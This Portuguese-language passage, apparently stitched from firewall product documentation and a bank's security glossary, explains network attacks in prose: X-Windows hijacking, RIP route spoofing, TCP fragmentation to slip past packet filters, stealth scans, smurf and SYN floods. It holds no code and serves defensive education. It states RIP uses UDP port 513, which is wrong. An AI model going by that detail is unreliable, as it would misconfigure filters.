Toda esta flexibilidade, entretanto, tem problemas de segurança: caso disponha de autorização do servidor X-Windows (a máquina onde está a tela gráfica), é possível para um atacante exercer um controle completo sobre o tela, capturando imagens e caracteres ou mesmo enviando caracteres para outras aplicações. É possível até mesmo simular o movimento do mouse ou encerrar outras aplicações.
Esta autorização muitas vezes não é difícil de ser conseguida: o X-Windows possui dois métodos de autenticação, um a nível de usuário e outro a nível de máquina. Quando se está usando autenticação a nível de máquina, um usuário pode através de roteamento dirigido ou IP spoofing se conectar ao servidor e passar a ter o controle total da tela. Mesmo a autenticação a nível de usuário não é muito segura, uma vez que as informações para acesso trafegam em texto pleno pela rede.
Além disso, existe uma vulnerabilidade em alguns servidores X-Windows de modo que é possível travá-los com um simples telnet para a porta do servidor. Este travamento pode durar até a conexão ser interrompida. O Firewall Aker bloqueia ataques deste tipo facilmente: os servidores X-Windows rodam em portas com números bem definidos (o primeiro servidor de cada máquina roda na porta 6000, o segundo na 6001 e assim sucessivamente) e portanto, basta bloquear o acesso a estas portas para máquinas externas.

Ataques utilizando o RIP
O protocolo RIP é um protocolo de configuração dinâmica de rotas (atualmente ele é o protocolo mais utilizado na Internet). Os roteadores dinâmicos utilizam o protocolo RIP para transmitir para outros roteadores (normalmente em broadcast) as melhores rotas para transmissão dos pacotes. Em geral cada roteador anuncia para os outros roteadores, de tempos em tempos, que ele é capaz de rotear pacotes para determinada rede, de tal forma que em pouco tempo, a partir destas mensagens, todos tem uma tabela única e otimizada de roteamento.
O problema principal do protocolo RIP é o que as informações não são checadas. Um atacante pode, portanto, enviar informações falsas e maliciosas de roteamento para os outros roteadores, de tal forma que possa fingir que é uma outra máquina, pretensamente confiável, ou até mesmo para gravar todos os pacotes enviados para uma determinada máquina.
Um ataque típico seria repassar, para os roteadores da rede, informação de que os pacotes enviados para uma determinada rede devem ser roteados através dele, atacante, que posteriormente os envia para a destinação correta. Durante a passagem dos pacotes, o atacante é capaz de examinar seu conteúdo em busca de senhas ou informações interessantes ou mesmo alterar seu conteúdo.
O Firewall Aker é capaz de bloquear ataques deste tipo: os pacotes RIP são pacotes UDP enviados para porta 513 e, portanto, basta bloquear pacotes para esta porta para que o ataque não possa ser efetivado.

Ataque de Fragmentação
Um ataque de fragmentação na verdade não é um ataques propriamente dito. Ele é uma maneira de fazer com que serviços TCP de máquinas protegidas por um filtro de pacotes possam ser acessados mesmo que o filtro não permita seu acesso (ou seja, ele é uma maneira de enganar o filtro de pacotes).
Boa parte dos filtros de pacotes tradicionais apenas filtra o primeiro fragmento de um pacote, uma vez que sem este fragmento não será possível para a máquina cliente montar o pacote completo, e deixa os demais fragmentos passarem. Além disso, se o primeiro fragmento não for um pacote de abertura de conexão, ele também é autorizado a passar.
O ataque consiste em se fragmentar o pacote TCP de modo que o segundo fragmento contenha parte do cabeçalho TCP, mais especificamente as portas e os flags do protocolo. Este segundo fragmento possuirá os flags para uma abertura de conexão. O primeiro fragmento consiste em um pacote que não é de abertura de conexão.
Da forma com que ambos os fragmentos foram montados, eles serão aceitos pelo filtro de pacotes e atingirão a máquina destino. Uma vez na máquina destino, os pacotes serão montados, produzindo um pacote de abertura de conexão, que se estivesse sido enviado inteiro teria sido bloqueado no filtro de pacotes. O Firewall Aker monta todos os fragmentos recebidos e desta forma não pode ser enganado por ataques deste tipo.

Varredura invisível
A varredura invisível (stealth scanning) é uma maneira de um atacante descobrir todos os serviços TCP que estão rodando em uma rede, mesmo que esta esteja sendo protegida por um filtro de pacotes (não será possível ser conectar aos serviços utilizando esta técnica, mas ela já um primeiro passo para um ataque). O ataque consiste em fazer uma varredura de portas (como já mostrado), porém com a diferença de não se enviar pacotes de abertura de conexão e sim pacotes simulando uma conexão existente. Como os filtros de pacotes normalmente permitem o trânsito dos pacotes que não são abertura de conexão, todos estes pacotes atingiriam a máquina destino. A máquina destino, ao receber os pacotes, reagiria de maneira diferenciada caso existisse um serviço rodando na porta especificada ou não.
O Firewall Aker impede este tipo de ataque uma vez que mantém um registro de todas as conexões abertas e só permite a passagem de pacotes para estas conexões.

Transparência dos dados na rede
A Internet é uma rede mundial composta de milhares de máquinas espalhadas por todo o mundo. Quando duas máquinas quaisquer estão se comunicando, todo o tráfego entre elas passa de máquina em máquina da origem até o destino. Na quase totalidade das vezes, a administração destas máquinas intermediárias é feita por terceiros e nada se pode afirmar quanto a sua honestidade. (na maioria das vezes, não é nem possível se saber de antemão por quais máquinas os pacotes passarão até atingir o destino).
O problema que isso causa, é que todo o tráfego entre as duas máquinas que estão se comunicando pode ser visualizado ou alterado por qualquer uma das máquinas intermediárias. Este problema se torna ainda mais crítico quando se pretende transmitir dados confidenciais ou críticos para a operação das duas entidades se comunicando.
O Firewall Aker resolve este problema possibilitando a criação de canais seguros de dados entre firewalls. Desta forma, toda a comunicação de dados entre duas redes conectadas à internet que possuam um firewall Aker (ou firewalls compatíveis com o mesmo padrão de criptografia) são enviadas autenticadas e criptografadas sendo, portanto, invisíveis e imutáveis para qualquer possível atacante. Esta operação é feita de forma transparente para as máquinas clientes.
Cavalo de TróiaO cavalo-de-tróia, ou trojan-horse, é um programa disfarçado que executa alguma tarefa maligna. Um exemplo: o usuário roda um jogo que conseguiu na Internet. O jogo secretamente instala o cavalo de tróia, que abre uma porta TCP do micro para invasão. Alguns trojans populares são NetBus, Back Orifice e SubSeven. Há também cavalos-de-tróias dedicados a roubar senhas e outros dados sigilosos.Quebra de SenhaO quebrador, ou cracker, de senha é um programa usado pelo hacker para descobrir uma senha do sistema. O método mais comum consiste em testar sucessivamente as palavras de um dicionário até encontrar a senha correta.Denial Of Service (DOS)Ataque que consiste em sobrecarregar um servidor com uma quantidade excessiva de solicitações de serviços. Há muitas variantes, como os ataques distribuídos de negação de serviço (DDoS), que paralisaram sites como CNN, Yahoo! e ZD Net em fevereiro deste ano. Nessa variante, o agressor invade muitos computadores e instala neles um software zumbi, como o Tribal Flood Network ou o Trinoo. Quando recebem a ordem para iniciar o ataque, os zumbis bombardeiam o servidor-alvo, tirando-o do ar.Mail BombÉ a técnica de inundar um computador com mensagens eletrônicas. Em geral, o agressor usa um script para gerar um fluxo contínuo de mensagens e abarrotar a caixa postal de alguém. A sobrecarga tende a provocar negação de serviço no servidor de e-mail.PhreakingÉ o uso indevido de linhas telefônicas, fixas ou celulares. No passado, os phreakers empregavam gravadores de fita e outros dispositivos para produzir sinais de controle e enganar o sistema de telefonia. Conforme as companhias telefônicas foram reforçando a segurança, as técnicas tornaram-se mais complexas. Hoje, o phreaking é uma atividade elaborada, que poucos hackers dominam.Scanners de Portas. Os scanners de portas são programas que buscam portas TCP abertas por onde pode ser feita uma invasão. Para que a varredura não seja percebida pela vítima, alguns scanners testam as portas de um computador durante muitos dias, em horários aleatórios.SmurfO Smurf é outro tipo de ataque de negação de serviço. O agressor envia uma rápida seqüência de solicitações de Ping (um teste para verificar se um servidor da Internet está acessível) para um endereço de broadcast. Usando spoofing, o cracker faz com que o servidor de broadcast encaminhe as respostas não para o seu endereço, mas para o da vítima. Assim, o computador-alvo é inundado pelo Ping.SniffingO sniffer é um programa ou dispositivo que analisa o tráfego da rede. Sniffers são úteis para gerenciamento de redes. Mas nas mãos de hackers, permitem roubar senhas e outras informações sigilosas.SpoofingÉ a técnica de se fazer passar por outro computador da rede para conseguir acesso a um sistema. Há muitas variantes, como o spoofing de IP. Para executá-lo, o invasor usa um programa que altera o cabeçalho dos pacotes IP de modo que pareçam estar vindo de outra máquina.ScammingTécnica que visa roubar senhas e números de contas de clientes bancários enviando um e-mail falso oferecendo um serviço na página do banco. O Banrisul não envia e-mails oferecendo nada, portanto qualquer e-mail desta espécie é falso.
Port Scans : o invasor lança sondas tentando estabelecer conexão com cada uma das 65.535 portas de seu computador, via o protocolo TCP/IP. Se existir qualquer serviço associado a uma porta, ele irá responder.

Impressão Digital (FingerPrint) : através do envio de uma sequência especial de pacotes IP a um endereço especifico, pode-se detectar que sistema operacional está rodando analizando os pacotes que ele envia de volta.

Ping Sweep : o 'ping' é um comando de protocolo que verifica se um determinado computador está 'vivo' ou não. Um hacker pode varrer centenas de possíveis endereços e saber em pouco tempo quais maquinas estão disponíveis na rede.

Sniffers : é a maneira mais simples de se obter senhas. Esses programas capturam todos os pacotes que passam pela rede, sejam eles destinados a sua máquina, ou não. Os hackers sabem como decifrar estes pacotes e localizar as senhas e informações que ele está procurando. Esse perigo é real e imediato : qualquer informação que você passar (senhas, nomes, números, imagens, etc.) está sendo vista, assistida e eventualmente gravada pelo hacker.

DoS "Denial of Service" : são formas e tecnicas de fazer com que um determinado serviço (preferencialmente a maquina inteira) fique inoperante.

SYN Flood : é uma inundação de SYNs, que são pacotes IP especiais que abrem uma conexão. Enviando uma chuva desses pacotes em curto espaço de tempo, o sistema abre muitas conexões com a maquina alvo e não fecha nenhuma. Consequentemente o sistema entra em colapso.